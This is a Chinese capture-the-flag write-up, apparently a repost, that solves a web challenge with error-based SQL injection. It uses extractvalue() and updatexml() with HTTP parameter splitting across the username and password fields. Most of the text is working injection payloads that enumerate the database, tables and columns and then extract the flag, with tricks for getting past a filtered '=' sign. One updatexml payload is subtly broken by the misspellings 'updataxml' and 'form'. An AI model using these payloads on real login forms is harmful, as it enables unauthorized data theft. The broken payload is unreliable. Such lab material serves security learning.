实验吧——加了料的报错注入-wp

こ雲淡風輕ζ 提交于 2019-12-01 02:27:10

题目链接: http://ctf5.shiyanbar.com/web/baocuo/index.php
在这题试过挺多种方法,最终网上学了两种方法,分别是extractvalue()报错注入和updatexml()报错注入,两种方法感觉都不错,但是两个都会被长度限制,最长是32位。

在这里插入图片描述
有题目可以看出是用post来传递参数,
在这里插入图片描述
构造post参数测试尝试一下直接注入:username=1’ &password= or’1。
fuzz一下,发现extractvalue()和updatexml没有被过滤掉

extractvalue()报错注入

原理:原理:xpath 函数报错注入
记得sql语句吗? where username=’???’ and password=’???’ 而sql语句中可以使用/ * * /注释掉中间的SQL语句。也就是说,我们可以使用 / * * /来解决这个问题,而且/* */也没有被吃掉,这叫做HTTP分割注入。构造语句

username='or extractvalue /*&password=*/(1,concat(0x5c,(select database()))) or'

爆出了库名
在这里插入图片描述
接下来就是要报错出表名,需要注意一点,就是=是被过滤掉了的,可以用in或者regexp代替

username='or extractvalue /*&password=*/(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema regexp 'error_based_hpf'))) or'

爆出表名
在这里插入图片描述
然后是字段名(列名)

username='or extractvalue /*&password=*/(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj'))) or'

爆出了列名
在这里插入图片描述
getflag

username='or extractvalue/*&password=*/(1,concat(0x5c,(select value from ffll44jj))) or'

在这里插入图片描述

updatexml()报错注入

updatexml()报错注入跟上面的挺像的,就是构造的有点不一样
首先要爆库名:

username=1' and updatexml/*&password=*/(1,concat(0x7e,(select database()),0x7e),1) or'1

在这里插入图片描述
爆表名

username=1' and updatexml/*&password=*/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where !(table_schema<>'error_based_hpf')),0x7e),3) or'

在这里插入图片描述
爆列名

username=1' and updataxml /*&password=*/(1,concat(0x7e,(select group_concat(column_name) form information_schema.columns where !(table_name<>'ffll44jj')),0x7e),3) or'1

在这里插入图片描述
getflag:

username=1' and updatexml/*&password=*/(1,concat(0x7e,(select value from ffll44jj),0x7e),3) or'1

在这里插入图片描述

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!